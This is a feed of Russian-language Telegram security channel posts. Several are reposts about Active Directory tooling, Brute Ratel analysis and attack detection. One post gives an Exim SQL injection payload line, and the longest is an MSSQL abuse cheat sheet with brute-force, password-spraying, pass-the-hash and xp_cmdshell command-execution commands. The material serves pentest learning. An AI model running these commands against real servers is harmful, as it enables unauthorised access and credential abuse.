Fsecurity | HH
2.06K subscribers
1.74K photos
105 videos
62 files
6.19K links
Канал про ИБ
Наш Discord: https://discord.gg/Eg8aDS7Hn7
Пожертвовать:
> https://www.donationalerts.com/r/xackapb
Download Telegram
Открылся бесплатный набор в 🎓 PFS Academy! Успевайте!
Все на нашем Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Что делать, если вас взломали

Уже не счесть, сколько раз я расписывал тут, что делать при взломе вашего Телеграм-аккаунта, куда идти, что нажимать, как проверять и не допускать (например: раз, два, три, четыре, пять, шесть).

И вот, я наткнулся на сайт, где по минутам в подробностях расписано по шагам и конкретным сценариям, как могут угнать ваш аккаунт и что в этих случаях делать. Переписывать всё это бессмысленно, поэтому просто ловите ссылку.

Какой бы крутой ни была навигация в Телеграм – так намного удобнее. Обязательно сохраните у тебя в закладках браузера и поделить со всеми, кого это может коснуться (то есть просто со всеми). Когда настанет время, вы будете себе благодарны.

#Полезное

Пакет Безопасности | 💬 Чат
🛍 Другие каналы
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from APT
🔍 Exploring NTDS.dit

This blog post examines the structure of the NTDS.dit file, which stores data for Active Directory. It also introduces DIT Explorer, a new open-source tool designed for analyzing NTDS.dit, demonstrating how it interprets the database to provide a structured view of the directory.

🔗 Research:
https://trustedsec.com/blog/exploring-ntds-dit-part-1-cracking-the-surface-with-dit-explorer

🔗 Source:
https://github.com/trustedsec/DitExplorer

#ad #windows #ntds #dnt
Forwarded from Adaptix Framework
Теперь с одного клиента можно будет одновременно с несколькими C2 серверами работать
Forwarded from APT
🦡 Technical Analysis of Brute Ratel C4 Payloads

This post provides a technical analysis of a Brute Ratel C4 badger/agent, a Red Team tool. The analysis includes API hashing, memory injection, encrypted C2 communications, and the first 20 C2 commands for remote control.

🔗 Source:
https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads/

#analysis #brc4 #redteam #blueteam
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Kali Linux
🔎 ClatScope — это мощный инструмент для проведения разведки с использованием открытых источников (OSINT), разработанный для сбора разнообразной информации об IP-адресах, доменах, электронных почтах, номерах телефонов и многом другом!

🔐 Лицензия: Apache-2.0

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Caster
Релиз моего первого видео по информационной безопасности.
Это доклад "Seen It All", об обнаружении атак на Active Directory на уровне сетевого трафика. Глубокий анализ пакетов, байтовых последовательностей и написание сигнатур для Suricata IDS.
Видео снабжено английскими субтитрами, которые я подготовил вручную.

Caster - Seen It All

Genre: Defensive
Label: Self
Release Date: 21 February 2025
Length: 27 Minutes 17 Seconds

Performed by: Caster
Visuals: Magama Bazarov
Voice: Magama Bazarov (Stereo)
Cover Man: Magama Bazarov (Sony ILCE-7M3, f/9.0, 1.6 sec)

https://www.youtube.com/watch?v=LvsBC9dGpWg
Все на нашем Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from Offensive Xwitter
DFS Targets & Links

Чтобы не делать так:

🔗 https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/post-exploitation#locate-dfs-targets

Теперь можно делать так:

🔗 https://github.com/c3c/ADExplorerSnapshot.py/pull/67
Forwarded from SecuriXy.kz
Обнаружена SQLi уязвимость CVE-2025-26794 в #Exim версии 4.98 при использовании сериализации ETRN.


ETRN #',1); ## INSERT SQL HERE ## /*


Для устранения проблемы рекомендуется обновиться до версии 4.98.1.

Подробности и эксплойт в контейнере доступны по ссылке https://github.com/OscarBataille/CVE-2025-26794
🔥1
Forwarded from REDtalk (closed_character)
🙂Привет, друзья!

На собеседованиях я часто спрашиваю про абьюз Microsoft SQL Server, и, к моему удивлению, многие знают о нём поверхностно. А ведь MSSQL широко используется в корпоративных сетях и при неправильной настройке может стать удобной точкой входа для атакующего.

В этом посте я постарался собрать основные техники абьюза MSSQL, которые помогут лучше понять возможные векторы атак, подготовиться к собеседованию и собрать ваши знания воедино.

📖 Немного теории

Microsoft SQL Server (MSSQL) — это реляционная СУБД от Microsoft, активно используемая в корпоративных сетях для хранения и обработки данных.

Основные компоненты:
🔹 Database Engine — отвечает за хранение, обработку и управление данными.
🔹 SQL Server Agent — автоматизация задач (например, резервное копирование).
🔹 SQL Server Browser — помогает клиентам находить MSSQL-инстансы.
🔹 SSIS (SQL Server Integration Services) — инструмент для интеграции данных.
🔹 SSRS (SQL Server Reporting Services) — генерация отчетов.
🔹 SSAS (SQL Server Analysis Services) — аналитика и обработка данных.

Основные роли в MSSQL:
🔹 sysadmin — полные привилегии на сервере.
🔹 db_owner — полные права в конкретной базе данных.
🔹 db_datareader — доступ только на чтение данных.
🔹 db_datawriter — возможность изменять данные.
🔹 public — назначается всем пользователям по умолчанию и может давать больше доступа, чем кажется.

Способы аутентификации:
🔹Windows Authentication — через доменную аутентификацию (NTLM/Kerberos).
🔹 SQL Authentication — локальные учетные записи MSSQL (sa, пользовательские логины).


Обнаружение MSSQL в сети

Прежде чем “что-то” ломать, нам это “что-то” надо найти.



#PowerUpSQL
Get-SQLInstanceDomain

#nmap
nmap -p 1433 --script ms-sql-info <IP>

#Metasploit
auxiliary/scanner/mssql/mssql_ping

#go-windapsearch
go-windapsearch -d domain.local -u Administrator -p 'password1111' -m custom --filter="(&(objectClass=computer)(servicePrincipalName=*MSSQLSvc/*))" --attrs cn,servicePrincipalName


🥰 Доступ к MSSQL



#brute force
hydra -L users.txt -P pass.txt <IP> mssql
netexec mssql <target-ip> -u username -p passwords.txt

#password spraying
netexec mssql example.com -u usernames.txt -p 'password' --no-bruteforce --continue-on-success

#Pass-the-Hash
netexec mssql example.com -u usernames.txt -H <NTLM_HASH> --continue-on-success

impacket-mssqlclient DOMAIN/user@IP -hashes <YourHash>


🤪 Повышение привилегий: от локального админа до sysadmin

Основной процесс SQL Server — это sqlservr.exe. Даже если у учетной записи SQL Server в Windows нет высоких привилегий, в самом SQL Server она по умолчанию получает роль sysadmin.

Компрометация службы SQL Server может привести к компрометации всего домена!

Шаг 1: Найдём локальный SQL Server.



# PowerUpSQL
Get-SQLInstanceLocal


Шаг 2: Получаем учетную запись SQL Server



#PowerUpSQL
Invoke-SQLImpersonateService -Verbose -Instance your_instance_name


🤗 Выполнение команд в OS через MSSQL

Злоумышленник, имея доступ к MSSQL, может выполнить команды Windows на сервере. Может он это сделать следующими способами:

🔹CLR (Common Language Runtime) Assembly — это механизм в Microsoft SQL Server, который позволяет выполнять .NET-код (C#, VB.NET, etc.) внутри базы данных.



#PowerUpSQL
Invoke-SQLOSCLR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"


🔹OLE Automation Procedures — это механизм в Microsoft SQL Server, который позволяет запускать объекты COM (Component Object Model) напрямую из T-SQL.



#PowerUpSQL
Invoke-SQLOSOle -Username sa -Password Pass123 -ServerInstance <IP> -Command "whoami"


🔹xp_cmdshell - встроенная хранимая процедура в Microsoft SQL Server, которая позволяет выполнять команды Windows напрямую из T-SQL



#SQL Server CLI
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';

#PowerUpSQL
Invoke-SQLOSCmd -Username sa -Password sa -Instance your_instance_name -Command "whoami"
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1